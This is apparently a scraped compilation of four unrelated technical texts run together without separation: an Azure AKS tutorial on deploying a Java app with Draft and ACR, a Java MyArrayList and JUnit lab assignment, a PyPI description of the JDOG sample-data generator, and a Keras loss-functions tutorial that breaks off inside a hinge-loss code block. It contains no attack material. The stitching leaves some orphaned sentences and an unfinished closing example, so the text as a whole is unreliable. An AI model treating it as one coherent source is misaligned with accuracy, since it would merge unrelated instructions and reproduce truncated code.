This article uses Azure Container Registry (ACR), so you must establish a trust relationship between your AKS cluster and the ACR registry, then configure Draft to push your container images to ACR. Create trust between AKS cluster and ACR To establish trust between an AKS cluster and an ACR registry, grant permissions for the Azure Active Directory service principal used by the AKS cluster to access the ACR registry. In the following commands, provide your own <resourceGroupName>, replace <aksName> with name of your AKS cluster, and replace <acrName> with the name of your ACR registry: # Get the service principal ID of your AKS cluster AKS_SP_ID=$(az aks show --resource-group <resourceGroupName> --name <aksName> --query "servicePrincipalProfile.clientId" -o tsv) # Get the resource ID of your ACR instance ACR_RESOURCE_ID=$(az acr show --resource-group <resourceGroupName> --name <acrName> --query "id" -o tsv) # Create a role assignment for your AKS cluster to access the ACR instance az role assignment create --assignee $AKS_SP_ID --scope $ACR_RESOURCE_ID --role contributor For more information on these steps to access ACR, see authenticating with ACR. Configure Draft to push to and deploy from ACR Now that there is a trust relationship between AKS and ACR, enable the use of ACR from your AKS cluster. Set the Draft configuration registry value. In the following commands, replace <acrName>with the name of your ACR registry: draft config set registry <acrName>.azurecr.io Log on to the ACR registry with az acr login: az acr login --name <acrName> As a trust was created between AKS and ACR, no passwords or secrets are required to push to or pull from the ACR registry. Authentication happens at the Azure Resource Manager level, using Azure Active Directory. Run an application To see Draft in action, let's deploy a sample application from the Draft repository. 
First, clone the repo: git clone Change to the Java examples directory: cd draft/examples/example-java/ Use the draft create command to start the process. This command creates the artifacts that are used to run the application in a Kubernetes cluster. These items include a Dockerfile, a Helm chart, and a draft.toml file, which is the Draft configuration file. $ draft create --> Draft detected Java (92.205567%) --> Ready to sail To run the sample application in your AKS cluster, use the draft up command. This command builds the Dockerfile to create a container image, pushes the image to ACR, and finally installs the Helm chart to start the application in AKS. The first time this command is run, pushing and pulling the container image may take some time. Once the base layers are cached, the time taken to deploy the application is dramatically reduced. $ draft up Draft Up Started: 'example-java': 01CMZAR1F4T1TJZ8SWJQ70HCNH example-java: Building Docker Image: SUCCESS ⚓ (73.0720s) example-java: Pushing Docker Image: SUCCESS ⚓ (19.5727s) example-java: Releasing Application: SUCCESS ⚓ (4.6979s) Inspect the logs with `draft logs 01CMZAR1F4T1TJZ8SWJQ70HCNH` If you encounter issues pushing the Docker image, ensure that you have successfully logged in to your ACR registry with az acr login, then try the draft up command again. Test the application locally To test the application, use the draft connect command. This command proxies a secure connection to the Kubernetes pod. When complete, the application can be accessed on the provided URL. Note It may take a few minutes for the container image to be downloaded and the application to start. If you receive an error when accessing the application, retry the connection. $ draft connect Connect to java:4567 on localhost:49804 [java]: SLF4J: Failed to load class "org.slf4j.impl.StaticLoggerBinder". [java]: SLF4J: Defaulting to no-operation (NOP) logger implementation [java]: SLF4J: See for further details. 
[java]: == Spark has ignited ... [java]: >> Listening on 0.0.0.0:4567 To access your application, open a web browser to the address and port specified in the draft connect output, such as. Use Control+C to stop the proxy connection. Note You can also use the draft up --auto-connect command to build and deploy your application then immediately connect to the first running container. Access the application on the internet The previous step created a proxy connection to the application pod in your AKS cluster. As you develop and test your application, you may want to make the application available on the internet. To expose an application on the internet, you create a Kubernetes service with a type of LoadBalancer, or create an ingress controller. Let's create a LoadBalancer service. First, update the values.yaml Draft pack to specify that a service with a type LoadBalancer should be created: vi charts/java/values.yaml Locate the service.type property and update the value from ClusterIP to LoadBalancer, as shown in the following condensed example: [...] service: name: java type: LoadBalancer externalPort: 80 internalPort: 4567 [...] Save and close the file, then use draft up to rerun the application: draft up It takes a few minutes for the service to return a public IP address. 
To monitor the progress, use the kubectl get service command with the watch parameter: kubectl get service --watch Initially, the EXTERNAL-IP for the service appears as pending: NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE example-java-java LoadBalancer 10.0.141.72 <pending> 80:32150/TCP 2m Once the EXTERNAL-IP address has changed from pending to an IP address, use Control+C to stop the kubectl watch process: NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE example-java-java LoadBalancer 10.0.141.72 52.175.224.118 80:32150/TCP 7m To see the application, browse to the external IP address of your load balancer with curl: $ curl 52.175.224.118 Hello World, I'm Java Iterate on the application Now that Draft has been configured and the application is running in Kubernetes, you are set for code iteration. Each time you want to test updated code, run the draft up command to update the running application. In this example, update the Java sample application to change the display text. Open the Hello.java file: vi src/main/java/helloworld/Hello.java Update the output text to display, Hello World, I'm Java in AKS!: package helloworld; import static spark.Spark.*; public class Hello { public static void main(String[] args) { get("/", (req, res) -> "Hello World, I'm Java in AKS!"); } } Run the draft up command to redeploy the application: $ draft up Draft Up Started: 'example-java': 01CMZC9RF0TZT7XPWGFCJE15X4 example-java: Building Docker Image: SUCCESS ⚓ (25.0202s) example-java: Pushing Docker Image: SUCCESS ⚓ (7.1457s) example-java: Releasing Application: SUCCESS ⚓ (3.5773s) Inspect the logs with `draft logs 01CMZC9RF0TZT7XPWGFCJE15X4` To see the updated application, curl the IP address of your load balancer again: $ curl 52.175.224.118 Hello World, I'm Java in AKS! Next steps For more information about using Draft, see the Draft documentation on GitHub.
https://docs.microsoft.com/en-us/azure/aks/kubernetes-draft
In this starter lab, you will create your first implementation of a data structure from the Java Collections Framework. You will also learn how to use Generics and get some practice writing test cases for your program. The purpose of this lab is to:

If you've not done so, I suggest you do Lab 0 first.

You'll be constructing your very own implementation of the ArrayList data structure so that you understand its inner workings. You should use the prefix "My" in your class names so that you don't accidentally use the standard ArrayList in your testing. However, you will be matching its behaviour, so when in doubt, you can refer back to the ArrayList documentation for clarification and/or use an ArrayList as a working reference solution.

Your MyArrayList class will implement the Java List interface; that is, you will need to implement the methods that interface declares. You'll be using generics for your implementation, and taking advantage of the fact that List and AbstractList are similarly parameterized. Just declare your class like the following:

public class MyArrayList<AnyType> extends AbstractList<AnyType>

AbstractList gives you all methods except for get(int index) and size(); however, you'll need to override many other methods to get your ArrayList in fighting form.

You should be using Javadoc style comments in your programs. You can use the following command to generate the Javadoc pages when you are done with your assignment. However, please delete the generated files before submitting your assignment.

% javadoc -d docs -link *.java

As you might expect, the backing storage for an ArrayList is an array. That is, an ArrayList is really just an array with the extra functionality of dynamic resizing. 
The MyArrayList's array will not always be full, because an ArrayList may change its size when the underlying array does not; therefore, your class will need to keep track of the number of items that are currently in the underlying array according to the ArrayList (which will at most times be different than the capacity/length of the array). Also, you need to keep the data in the array packed to the front so there are no gaps.

Add the following members to your MyArrayList class. Implement the following constructors in your MyArrayList class. You may get a compiler warning about allocating an array of a generic type. This can be solved by using casting and a special marker in the source code to suppress the warning. Allocate in a manner similar to:

AnyType[] someArray = (AnyType[]) new Object[numElements];

and have a line

@SuppressWarnings("unchecked")

between your JavaDoc comments and the method header. This doesn't remove the warning in 1.5, but does in 1.6, and it will get rid of the error message in Eclipse.

You will need to implement a private resize method that doubles the size of the array (do not just increase its length by one; hopefully you saw on the prelab how inefficient that is!) by creating a new array of twice the current size, copying the data over, then resetting the data pointer to point to the new array. Feel free to write more private methods as you see fit.

Implement the following methods in your MyArrayList class. (When an index is invalid, throw new IndexOutOfBoundsException(); or even better: throw new IndexOutOfBoundsException("Index Out of Bounds! You tried to get " + index + " but the size is " + size); or something to that effect.)

When the array is full, and a user tries to add something in, you should double the size of the array (rather than just increase the size by one), copy the old array into the new array, and add the new element. You'll need to copy the previous items into the same slots in the new array. 
You should probably have a private method for this array resizing. I'd suggest printing yourself a message when it is called at first, indicating what size it is and what size it becomes. Just be sure to remove it after doing some testing. Also, take advantage of your existing methods and don't duplicate logic. You've got two constructors and two add() methods. Only one needs to do the real work; the second should just figure out a way to call the first. You should include a meaningful message when you construct the IndexOutOfBoundsException. (For example, when Java's ArrayList throws an IndexOutOfBoundsException, it tells you which index was accessed and the size of the arraylist. This seems like good information.)

We now interrupt this lab to bring you an important message about testing. The programs you will write in this course get increasingly complex, and increasingly difficult to debug. We want to strongly encourage you to get into good testing habits now, right off the bat. Many of you have survived thus far by writing allll your code for a lab in one fell swoop and then testing (if that) as an afterthought at the end. Some of you are even strangely proud of this fact. This is no longer a feasible approach. Your life will be much simpler if you "write a bit, test a bit". So before you proceed to the rest of your MyArrayList implementation, you will test the code you have written thus far, using a fancy Java testing framework called JUnit. As a side note, some people take this to the extreme. The JUnit framework addresses these issues, and more. JUnit is a widely-used API that enables developers to easily create Java test cases. It provides a comprehensive assertion facility to verify expected versus actual results. 
It is simple to write a JUnit test case, especially in Eclipse:

MyArrayList<Integer> test = new MyArrayList<Integer>();
ArrayList<Integer> real = new ArrayList<Integer>();
assertEquals("Size after construction", real.size(), test.size());

Basically, we construct an arraylist with our implementation, and compare it to that of Java's. Ideally the size of our new arraylist is 0, which should be real.size() anyway. How useful is that! Change it back.

MyArrayList<Integer> test = new MyArrayList<Integer>();
ArrayList<Integer> real = new ArrayList<Integer>();
assertEquals("Size after construction", real.size(), test.size());
test.add(0, 5);
real.add(0, 5);
assertEquals("Size after add", real.size(), test.size());

To test the exception that should be thrown when adding "off the left" of the list:

@Test(expected=IndexOutOfBoundsException.class)
public void testForAddLeftException() throws Exception {
    MyArrayList<Integer> test = new MyArrayList<Integer>();
    test.add(-1, 5);
}

To test the exception that should be thrown by the add method when adding "off the right" of the list, we would use a second method:

@Test(expected=IndexOutOfBoundsException.class)
public void testForAddRightException() throws Exception {
    MyArrayList<Integer> test = new MyArrayList<Integer>();
    test.add(test.size() + 1, 5);
}

Now let's have you try. In each of the following test methods, implement the recommended test.

Read Strings from the file test1.txt, creating a MyArrayList of Strings (and probably also an ArrayList of the same strings) by inserting each line of the file, one at a time, into a MyArrayList<String> using the add(element) method. Then loop through your two lists element-by-element and assert that the ith element should be equal for each i. If you are doing this from Eclipse in the lab (and maybe at home), you may have to specify the entire path of the file, not just the relative path. It seems as though Eclipse is being run from some mystery location, so this is how it must be done! 
Again, read Strings from test1.txt, but insert each line at the front of the list using add(index, element).

Add on to the end of the previous test by reconstructing your two arrays. Perform the same steps, but insert each line at the midpoint (size/2) of the list.

There you go, your very first JUnit tests! As you implement the rest of your arraylist methods, please write the accompanying JUnit test, and add to any previous ones.

Now spend some time finishing up your implementation of your MyArrayList class. Don't forget to write (and run!) your tests as you go along. Implement the remaining methods in your MyArrayList class. When you are done, write a README file and submit it with your lab:

% lshand                    # should show that you've handed in something

You can also specify the options to handin from the command line:

% cd ~/cs151                # goes to your cs151 folder
% handin -c 151 -a 1 lab1   # file/directory is lab1
% lshand                    # should show that you've handed in something
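To tie the pieces together, here is a hedged partial sketch of the add/resize behaviour described earlier (this is not the official solution; the field names are my own, and the remaining List methods are left for you to implement):

```java
import java.util.AbstractList;

public class MyArrayList<AnyType> extends AbstractList<AnyType> {
    private AnyType[] data; // backing storage
    private int size;       // number of items actually in the list

    @SuppressWarnings("unchecked")
    public MyArrayList() {
        data = (AnyType[]) new Object[10];
        size = 0;
    }

    public int size() {
        return size;
    }

    public AnyType get(int index) {
        if (index < 0 || index >= size)
            throw new IndexOutOfBoundsException("index " + index + ", size " + size);
        return data[index];
    }

    // Double the capacity; do not just grow by one.
    @SuppressWarnings("unchecked")
    private void resize() {
        AnyType[] bigger = (AnyType[]) new Object[data.length * 2];
        System.arraycopy(data, 0, bigger, 0, size);
        data = bigger;
    }

    public void add(int index, AnyType element) {
        if (index < 0 || index > size)
            throw new IndexOutOfBoundsException("index " + index + ", size " + size);
        if (size == data.length) resize();
        for (int i = size; i > index; i--) // shift items right to open a gap
            data[i] = data[i - 1];
        data[index] = element;
        size++;
    }
}
```

Note how add(element), inherited from AbstractList, simply delegates to add(size(), element), so only one method does the real work.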
Just another Data Offline Generator

Project description

Just another Data Offline Generator (JDOG) 🐶 🗎

Full documentation.

- JDOG is a Python library which helps generate sample data for your projects.
- JDOG can also be run as a CLI tool.
- To generate sample data, a data scheme is provided.

Scheme

- The scheme is provided in JSON format with special placeholders.
- In the output, the placeholders are replaced with generated data.

Any valid JSON is a valid scheme.

How to use it?

Install it:

python -m pip install jdog

Prepare a scheme:

{
  "{{range(people,4)}}": {
    "name": "{{name}}",
    "age": "{{age}}",
    "address": {
      "city": "{{city}}"
    },
    "car": "{{option(mustang,{{empty}})}}"
  }
}

Use it:

from jdog import Jdog

def main():
    jdog = Jdog()
    scheme = ...  # your loaded scheme
    # parse scheme
    jdog.parse_scheme(scheme)
    # generate instance
    result = jdog.generate()
    print(result)  # result is JSON

And the example result:

{
  "people": [
    {
      "name": "Brandi Young",
      "age": 39,
      "address": { "city": "Jamietown" },
      "car": "mustang"
    },
    {
      "name": "Michelle Best",
      "age": 70,
      "address": { "city": "Port Dustin" },
      "car": ""
    },
    {
      "name": "Donald Hernandez",
      "age": 79,
      "address": { "city": "East Julieshire" },
      "car": "mustang"
    },
    {
      "name": "Kaitlyn Cook",
      "age": 3,
      "address": { "city": "Rachelton" },
      "car": "mustang"
    }
  ]
}

CLI

The package can be used as a CLI tool.

Usage: jdog [OPTIONS] SCHEME

  Accepts SCHEME and generates new data to stdin or to specified OUTPUT

Options:
  -p, --pretty           Output as pretty JSON.
  -s, --strict           Raise error when no matching placeholder is found.
  -l, --lang TEXT        Language to use.
  --lang-help            Displays available language codes and exit.
  -o, --output FILENAME  Output file where result is written.
  --help                 Show this message and exit.

By default, the CLI tool does not save output to a file; it just prints the results to standard output.

👍 JDOG uses the awesome package Faker to generate random data.
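To give a feel for what the scheme placeholders do, here is a toy placeholder substitution in plain Python. This is purely illustrative: it is not how JDOG itself is implemented, it only handles simple non-nested `{{...}}` tokens, and the generator table is made up for the example.

```python
import re

# Toy stand-ins for generated values; JDOG uses Faker for the real thing.
GENERATORS = {
    'name': lambda: 'Brandi Young',
    'age': lambda: 39,
    'city': lambda: 'Jamietown',
}

def fill_placeholders(text):
    # Replace each {{token}} with the output of its generator.
    def sub(match):
        return str(GENERATORS[match.group(1)]())
    return re.sub(r'\{\{(\w+)\}\}', sub, text)

print(fill_placeholders('{"name": "{{name}}", "city": "{{city}}"}'))
# prints {"name": "Brandi Young", "city": "Jamietown"}
```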
In this article, there is an in-depth discussion on:

- What are loss functions?
- What are evaluation metrics?
- Commonly used loss functions in Keras (regression and classification)
- Built-in loss functions in Keras
- What is a custom loss function?
- Implementation of common loss functions in Keras
- Custom loss functions for layers, i.e. custom regularization losses
- Dealing with NaN values in a Keras loss
- Why should you use a custom loss?
- Monitoring Keras loss using callbacks

What are Loss Functions

Loss functions are one of the core parts of a machine learning model. If you've been in the field of data science for some time, you must have heard of them. Loss functions, also known as cost functions, are special functions that help us minimize the error and get as close as possible to the expected output. In deep learning, the loss is computed to get the gradients for the model weights, and those weights are then updated accordingly using backpropagation.

Source: FreeCodeCamp

A basic understanding of error can be gained from the image above, where there is an actual value and a predicted value. The difference between the actual value and the predicted value is the error. In equation form:

error = hθ(x) − y

So our goal is to minimize the difference between the predicted value hθ(x) and the actual value y. In other words, you have to minimize the value of the cost function. This main idea can be understood better from the following picture by Professor Andrew Ng, where he explains choosing the values of θ0 and θ1 (the weights of the model) such that the prediction hθ(x) is closest to the actual output y. Here Professor Andrew Ng is using the Mean Squared Error function, which will be discussed later on. Put simply, the goal of a machine learning model is to minimize the cost and maximize the evaluation metric.
This can be achieved by updating the weights of the machine learning model using an algorithm such as Gradient Descent. Here you can see the weights being updated using the cost function.

What are Evaluation Metrics

Evaluation metrics are the metrics used to evaluate and judge the performance of a machine learning model. Evaluating a machine learning project is essential. There are different evaluation metrics, such as Mean Squared Error, Accuracy, Mean Absolute Error, etc. The cost functions used for training, such as mean squared error or binary cross-entropy, are also metrics, but their raw values are difficult to read and interpret, so there is a need for other metrics like Accuracy, Precision, and Recall. Using different metrics is important because a model may look good by one measurement but perform poorly by another.

Here you can see the performance of a model using 2 metrics. The first one is loss and the second one is accuracy. The loss function (cross-entropy in this example) has a value of 0.4474, which is difficult to interpret on its own, but the accuracy shows that the model is currently 80% accurate. Hence it is important to use evaluation metrics other than the loss/cost function alone to properly evaluate the model's performance and capabilities.

Some of the common evaluation metrics include:

- Accuracy
- Precision
- Recall
- F1 Score
- MSE
- MAE
- Confusion Matrix
- Logarithmic Loss
- ROC curve

And many more.

Commonly Used Loss Functions in Machine Learning Algorithms and their Keras Implementation

Source: Heartbeat

Common Regression Losses:

Regression is the type of problem where you are going to predict a continuous variable. This means that the variable can be any number, not one of a set of specific labels.
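The weight-update loop described above can be sketched in a few lines of plain Python. This is a minimal illustration, not tied to any framework; the toy data, learning rate, and single-weight model y = w·x are made up for the example.

```python
# Fit y = w * x to toy data by minimizing mean squared error with
# plain gradient descent. For MSE, d(loss)/dw = (2/n) * sum((w*x - y) * x).

def mse(w, xs, ys):
    return sum((w * x - y) ** 2 for x, y in zip(xs, ys)) / len(xs)

def grad(w, xs, ys):
    return 2 * sum((w * x - y) * x for x, y in zip(xs, ys)) / len(xs)

def fit(xs, ys, lr=0.01, steps=100):
    w = 0.0
    for _ in range(steps):
        w -= lr * grad(w, xs, ys)  # step against the gradient
    return w

xs, ys = [1.0, 2.0, 3.0], [2.0, 4.0, 6.0]  # true relationship: y = 2x
w = fit(xs, ys)
print(round(w, 3))  # converges to 2.0
```

Each step lowers the cost a little, which is exactly the "minimize the cost function" idea from the discussion above.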
For example, when you have to predict the prices of houses, a house can have any price, so it is a regression problem. Some common examples of regression tasks are:

- Price prediction
- Stock market prediction
- Financial forecasting
- Trend analysis
- Time series predictions

And many more.

The figure above illustrates a regression problem where you predict the price of a house from three features: the size of the house, the number of rooms, and the number of baths. The model will check these features and predict a continuous number that will be the price of the house. Since regression problems deal with predicting a continuous number, you have to use different types of losses than for classification problems. Some of the commonly used loss functions in regression problems are as follows.

Mean Squared Error

Mean squared error, also known as L2 loss, is mainly used for regression tasks. As the name suggests, it is calculated by taking the mean of the squared error, the difference between the actual and predicted values:

MSE = (1/n) Σ (Yi − Ŷi)²

where Ŷi is the predicted value and Yi is the actual value. Mean squared error penalizes the model heavily for making large errors, because of the square. This is the reason that this loss function is less robust to outliers in the dataset.

Implementation in Keras.

Standalone usage:

import keras
import numpy as np

y_true = np.array([[10.0, 7.0]])  # sample data
y_pred = np.array([[8.0, 6.0]])
a = keras.losses.MSE(y_true, y_pred)
print(f'Value of Mean Squared Error is {a.numpy()}')

Here the predicted values and the true values are passed to the Mean Squared Error function from keras.losses, which computes the loss. It returns a tf.Tensor object, which has been converted into numpy to see the value more clearly.

Using via the compile method:

Keras losses can be specified for a deep learning model using the compile method from keras.Model.
model = keras.Sequential([
    keras.layers.Dense(10, input_shape=(1,), activation='relu'),
    keras.layers.Dense(1)
])

And now the compile method can be used to specify the loss and metrics.

model.compile(loss='mse', optimizer='adam')

Now when the model is trained, it will use the Mean Squared Error loss function to compute the loss and update the weights using the Adam optimizer.

model.fit(np.array([[10.0], [20.0], [30.0], [40.0], [50.0], [60.0], [10.0], [20.0]]),
          np.array([6, 12, 18, 24, 30, 36, 6, 12]), epochs=10)

Mean Absolute Error

Mean absolute error, also known as L1 loss, is defined as the average of the absolute differences between the actual values and the predicted values:

MAE = (1/n) Σ |Yi − Ŷi|

Mean absolute error uses a scale-dependent accuracy measure, which means that it uses the same scale as the data being measured; thus it cannot be used to make comparisons between series that use different scales. Mean absolute error is also a common regression loss, which means that it is used to predict a continuous variable.

Standalone implementation in Keras:

import keras
import numpy as np

y_true = np.array([[10.0, 7.0]])  # dummy data
y_pred = np.array([[8.0, 6.0]])
c = keras.losses.MAE(y_true, y_pred)  # calculating loss
print(f'Value of Mean Absolute Error is {c.numpy()}')

What you have to do is pass the true and predicted labels to the MAE function from keras.losses, which calculates the loss using the equation given above.

Implementing using the compile method

When working with a deep learning model in Keras, you have to define the model structure first.

model = keras.models.Sequential([
    keras.layers.Dense(10, input_shape=(1,), activation='relu'),
    keras.layers.Dense(1)
])

After defining the model architecture, you have to compile it and use the MAE loss function.
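To make the robustness-to-outliers point concrete, here is the MSE and MAE arithmetic in plain Python, with toy numbers and no Keras involved:

```python
# Compare how MSE and MAE react when one prediction is badly off.

def mse(y_true, y_pred):
    return sum((t - p) ** 2 for t, p in zip(y_true, y_pred)) / len(y_true)

def mae(y_true, y_pred):
    return sum(abs(t - p) for t, p in zip(y_true, y_pred)) / len(y_true)

y_true  = [10.0, 7.0, 5.0]
good    = [9.0, 6.0, 5.0]   # small errors everywhere
outlier = [9.0, 6.0, 15.0]  # one prediction off by 10

print(mse(y_true, good), mae(y_true, good))        # both about 0.67
print(mse(y_true, outlier), mae(y_true, outlier))  # 34.0 vs 4.0
```

A single error of 10 raises the MSE from 0.67 to 34.0 but the MAE only from 0.67 to 4.0, which is what "less robust to outliers" means for the squared loss.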
Notice that there is a linear (i.e. no) activation function in the last layer, which means that you are going to predict a continuous variable.

model.compile(loss='mae', optimizer='adam')

You can now simply fit the model to check its progress. Here the model is trained on a very small dummy array just to check the progress.

model.fit(np.array([[10.0], [20.0], [30.0], [40.0], [50.0], [60.0], [10.0], [20.0]]),
          np.array([6, 12, 18, 24, 30, 36, 6, 12]), epochs=10)

And you can see the loss value, calculated using the MAE formula, for each epoch.

Common Classification Losses:

Classification problems are those problems in which you have to predict a label. This means that the output should be only one of the given labels that you have provided to the model. For example:

There is a problem where you have to detect whether the input image belongs to a given class, such as dog, cat, or horse. The model will predict 3 numbers ranging from 0 to 1, and the class with the highest probability will be picked.

If you want to predict whether it is going to rain tomorrow or not, the model can output a number between 0 and 1, and you will choose the option of rain if it is greater than 0.5, and no rain if it is less than 0.5.

Common Classification Loss:

1. Cross-Entropy

Cross-entropy is one of the most commonly used classification loss functions. You can say that it is a measure of the dissimilarity between two probability distributions. For example, in the task of predicting whether it will rain tomorrow or not, there are two distributions, one for True and one for False. Cross-entropy comes in 3 main types.

a. Binary Cross Entropy

Binary cross-entropy, as the name suggests, is the cross-entropy that occurs between two classes, i.e. in binary classification problems where you have to detect whether an example belongs to class 'A', and if it does not belong to class 'A', then it belongs to class 'B'.
Just like in the example of rain prediction: if it is going to rain tomorrow, then it belongs to the rain class, and if there is a low probability of rain tomorrow, then it belongs to the no-rain class. The mathematical equation for binary cross-entropy is:

BCE = −(1/N) Σ [ yi log(ŷi) + (1 − yi) log(1 − ŷi) ]

This loss function has 2 parts. If the actual label is 1, the term after the '+' becomes 0 because 1 − 1 = 0, so the loss when the label is 1 is:

−log(ŷi)

And when the label is 0, the first term becomes 0, so the loss in that case is:

−log(1 − ŷi)

This loss function is also known as the log loss function, because of the logarithm in the loss.

Standalone implementation:

You can create an object for binary cross-entropy from keras.losses, then pass in the true and predicted labels.

import keras
import numpy as np

y_true = np.array([[1.0]])
y_pred = np.array([[0.9]])
loss = keras.losses.BinaryCrossentropy()
print(f"BCE LOSS VALUE IS {loss(y_true, y_pred).numpy()}")

Implementation using the compile method

To use binary cross-entropy in a deep learning model, design the architecture and compile the model while specifying the loss as binary cross-entropy.

import keras
import numpy as np

model = keras.models.Sequential([
    keras.layers.Dense(16, input_shape=(2,), activation='relu'),
    keras.layers.Dense(8, activation='relu'),
    keras.layers.Dense(1, activation='sigmoid')  # sigmoid for a probabilistic output
])

model.compile(optimizer='sgd',
              loss=keras.losses.BinaryCrossentropy(),  # binary cross entropy
              metrics=['acc'])

model.fit(np.array([[10.0, 20.0], [20.0, 30.0], [30.0, 6.0], [8.0, 20.0]]),
          np.array([1, 1, 0, 1]), epochs=10)

This will train the model using the binary cross-entropy loss function.

b. Categorical Cross Entropy

Categorical cross-entropy is the cross-entropy used for multi-class classification. This means that for a single training example, you get n probabilities, and you take the class with the maximum probability, where n is the number of classes.
Mathematically, you can write it as:

CCE = −(1/N) Σi Σc 1(yi ∈ Cc) log Pmodel[yi ∈ Cc]

The double sum is over the N examples and C categories. The term 1(yi ∈ Cc) is the indicator that the ith observation belongs to the cth category. Pmodel[yi ∈ Cc] is the probability predicted by the model for the ith observation to belong to the cth category. When there are more than 2 classes, the neural network outputs a vector of C probabilities, one per class. When the number of categories is just two, the neural network outputs a single probability ŷi, with the other one being 1 minus the output. This is why binary cross-entropy looks a bit different from categorical cross-entropy, despite being a special case of it.

Standalone implementation

Create a categorical cross-entropy object from keras.losses and pass in the true and predicted labels, on which it will calculate the cross-entropy and return a tensor. Note that you have to provide a one-hot encoded matrix showing the probability for each class, as shown in this example.

import keras
import numpy as np

y_true = [[0, 1, 0], [0, 0, 1]]  # 3 classes
y_pred = [[0.05, 0.95, 0], [0.1, 0.5, 0.4]]
loss = keras.losses.CategoricalCrossentropy()
print(f"CCE LOSS VALUE IS {loss(y_true, y_pred).numpy()}")

Implementation using the compile method

When implemented using the compile method, you design a model in Keras and compile it using the categorical cross-entropy loss. When the model is trained, it calculates the loss based on categorical cross-entropy and updates the weights according to the given optimizer.
import keras
import numpy as np
from keras.utils import to_categorical  # to one-hot encode the data

model = keras.models.Sequential([
    keras.layers.Dense(16, input_shape=(2,), activation='relu'),
    keras.layers.Dense(8, activation='relu'),
    keras.layers.Dense(3, activation='softmax')  # softmax for multiclass probability
])

model.compile(optimizer='sgd',
              loss=keras.losses.CategoricalCrossentropy(),  # categorical cross entropy
              metrics=['acc'])

model.fit(np.array([[10.0, 20.0], [20.0, 30.0], [30.0, 6.0], [8.0, 20.0], [-1.0, -100.0], [-10.0, -200.0]]),
          to_categorical(np.array([1, 1, 0, 1, 2, 2])),
          epochs=10)

Here, it will train the model on our dummy dataset.

c. Sparse Categorical Cross Entropy

Mathematically, there is no difference between categorical cross-entropy and sparse categorical cross-entropy. According to the official documentation:

"Use this cross entropy loss function when there are two or more label classes. We expect labels to be provided as integers. If you want to provide labels using one-hot representation, please use CategoricalCrossentropy loss. There should be # classes floating point values per feature for y_pred and a single floating point value per feature for y_true."

As you saw earlier with categorical cross-entropy, a one-hot matrix was passed as the true labels, for example:

to_categorical(np.array([1, 1, 0, 1, 2, 2]))

For sparse categorical cross-entropy in Keras, you instead pass in label-encoded (integer) labels. You can use sklearn for this purpose. Let's see an example to understand better.

from sklearn.preprocessing import LabelEncoder

le = LabelEncoder()
output = le.fit_transform(np.array(['High chance of Rain', 'No Rain', 'Maybe',
                                    'Maybe', 'No Rain', 'High chance of Rain']))

Here a LabelEncoder object has been created, and the fit_transform method is used to encode the labels. The output is an integer array: [0 2 1 1 2 0].
Standalone implementation

To perform a standalone computation, you need to perform label encoding on the labels. y_pred should contain n floating point values per example, where n is the total number of classes, and y_true a single integer per example.

from sklearn.preprocessing import LabelEncoder

t = LabelEncoder()
y_pred = [[0.1, 0.1, 0.8], [0.1, 0.4, 0.5], [0.5, 0.3, 0.2], [0.6, 0.3, 0.1]]
y_true = t.fit_transform(['Rain', 'Rain', 'High Chances of Rain', 'No Rain'])
loss = keras.losses.SparseCategoricalCrossentropy()
print(f"Sparse Categorical Loss is {loss(y_true, y_pred).numpy()}")

Implementation using model.compile

To implement sparse categorical cross-entropy in a deep learning model, you have to design the model and compile it using the sparse categorical cross-entropy loss. Remember to perform label encoding of your class labels so that sparse categorical cross-entropy can work.

import keras
import numpy as np
from sklearn.preprocessing import LabelEncoder

model = keras.models.Sequential([
    keras.layers.Dense(16, input_shape=(2,), activation='relu'),
    keras.layers.Dense(8, activation='relu'),
    keras.layers.Dense(3, activation='softmax')  # softmax for multiclass probability
])

le = LabelEncoder()
model.compile(optimizer='sgd',
              loss=keras.losses.SparseCategoricalCrossentropy(),  # sparse categorical cross entropy
              metrics=['acc'])

Now the model can be trained on the dummy dataset.

model.fit(np.array([[10.0, 20.0], [20.0, 30.0], [30.0, 6.0], [8.0, 20.0], [-1.0, -100.0], [-10.0, -200.0]]),
          le.fit_transform(np.array(['High chance of Rain', 'High chance of Rain', 'High chance of Rain',
                                     'Maybe', 'No Rain', 'No Rain'])),
          epochs=10)

The model has been trained, with the loss calculated using sparse categorical cross-entropy and the weights updated using stochastic gradient descent.

2. Hinge Loss

Hinge loss is a commonly used loss function for classification problems. It is mainly used in problems where you have to do 'maximum-margin' classification.
A common example is Support Vector Machines. The following image shows how maximum-margin classification works.

Source: Stanford NLP Group

The mathematical formula for hinge loss (as implemented in Keras, with labels yi in {−1, 1}) is:

loss = mean(max(1 − yi · ŷi, 0))

where yi is the actual label and ŷi is the predicted value. When the prediction has the same sign as the label and lies beyond the margin, the loss is zero; when it has the opposite sign, the loss grows linearly. This is why it is known as maximum-margin classification.

Standalone implementation:

To perform a standalone computation of hinge loss in Keras, use the Hinge class from keras.losses.

import keras
import numpy as np

y_true = [[0., 1.], [0., 0.]]
y_pred = [[0.6, 0.4], [0.4, 0.6]]
h = keras.losses.Hinge()
print(f'Value for Hinge Loss is {h(y_true, y_pred).numpy()}')

Implementation using the compile method

To implement hinge loss using the compile method, design the model and compile it with the loss set to hinge. Note that hinge loss works best with tanh as the activation in the last layer.

import keras
import numpy as np
from sklearn.preprocessing import LabelEncoder

model = keras.models.Sequential([
    keras.layers.Dense(16, input_shape=(2,), activation='relu'),
    keras.layers.Dense(8, activation='tanh'),
    keras.layers.Dense(1, activation='tanh')
])

model.compile(optimizer='adam', loss=keras.losses.Hinge(), metrics=['acc'])  # hinge loss

le = LabelEncoder()
model.fit(np.array([[10.0, 20.0], [20.0, 30.0], [30.0, 6.0], [-1.0, -100.0], [-10.0, -200.0]]),
          le.fit_transform(np.array(['High chance of Rain', 'High chance of Rain', 'High chance of Rain',
                                     'No Rain', 'No Rain'])),
          epochs=10, batch_size=5)

This will train the model using hinge loss and update the weights using the Adam optimizer.

Custom Loss Functions

So far you have seen some of the important cost functions that are widely used in industry, are easy to understand, and are built into famous deep learning frameworks such as Keras or PyTorch.
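Before moving on, the hinge computation can be reproduced by hand in plain Python. This assumes the {0, 1} → {−1, +1} label conversion that Keras documents for its Hinge loss; the numbers are the same toy values as the standalone example above.

```python
# Hinge loss by hand: labels in {0, 1} are first mapped to {-1, +1},
# then loss = mean(max(1 - y_true * y_pred, 0)) per sample,
# averaged over the batch.

def hinge(y_true, y_pred):
    per_sample = []
    for row_t, row_p in zip(y_true, y_pred):
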